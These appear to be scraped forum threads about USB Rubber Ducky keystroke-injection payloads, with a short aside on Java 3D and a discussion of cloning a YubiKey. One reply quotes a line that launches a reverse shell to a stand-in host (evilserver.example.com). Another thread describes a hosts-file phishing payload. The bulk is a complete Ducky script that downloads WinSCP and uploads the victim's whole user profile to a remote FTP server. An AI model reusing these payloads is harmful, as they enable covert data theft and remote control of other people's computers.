[[Payload] Reverse Shell Payload Problem]

Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected!

I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file !

Excuse my newness

Thanks

It's stated in the code:

STRING c:\reverse.exe evilserver.example.com 8080

@wiki you can find how you can setup the receiving end.

[Java Programming Question]

I've worked with Java 3D a couple of times. It's very fun and easy to pick up (the basic stuff). http://www.java3d.org/index.html is where you can find some more info.

[[Question] Could You Turn The Ducky Into A Yubikey Clon]

Hi

Just a though. Could you make the Ducky into a Yubikey clon ?

Thank you..

there are 3 "layers" of security:

something you know (e.g. password)

something you have (e.g. yubikey, rfid)

something you are (e.g. fingerprint)

I don't know the yubikey at all, but from what I see, it can be done

The YubiKey is placed in the USB port. The YubiKey is recognized as a USB keyboard so it works on all computers, platforms and browsers with no client software needed

This is exactly what a rubber ducky is.

With a simple touch on the YubiKey, it automatically generates and enters a unique identity and One-Time Password (OTP).

sure it could find a timestamp on your computer, do some "very important and complicated calculations" with the timestamp, open notepad (or any other app) and show you your secret code.

[[Payload] Ducky Phisher]

how do you reverse it if you wanna reset the default settings?(meaning you wanna direct to user to the real page )

thanks

xcopy the original file first before you edit it to host.backup. After you're done you can replace the hacked file with the original.

[[Payload] Ftp Script]

I got my rubber ducky today so I could test and fix my FTP script.

Windows FTP commandline doesn't support recursive uploading of folders. Therefor I download winSCP first and use that to upload the files. winscp.com is 90kb, winscp.exe is 6mb. You can tweak the delays depending on your connection speed

the user uploading the files to SERVER2 should only have write access.

REM Author: Robert Lampe

REM DuckenCoder: 1.0

REM Target: Windows 7

REM Description: This script downloads WinSCP and uploads the user profile, recursive, to a FTP server.

CTRL ESC

DELAY 200

STRING cmd

ENTER

DELAY 800

STRING cd %USERPROFILE%

ENTER

REM get WINSCP from a server. Because the user has rights to download files, be sure nothing else can be found.

STRING ftp -i SERVER

ENTER

DELAY 800

STRING USERNAME

ENTER

STRING PASSWORD

ENTER

STRING GET WinSCP.com

ENTER

DELAY 200

STRING GET WinSCP.exe

ENTER

DELAY 3000

STRING quit

ENTER

REM FTP user needs only Write access, NOT read / delete access.

STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"

ENTER

ALT SPACE

STRING N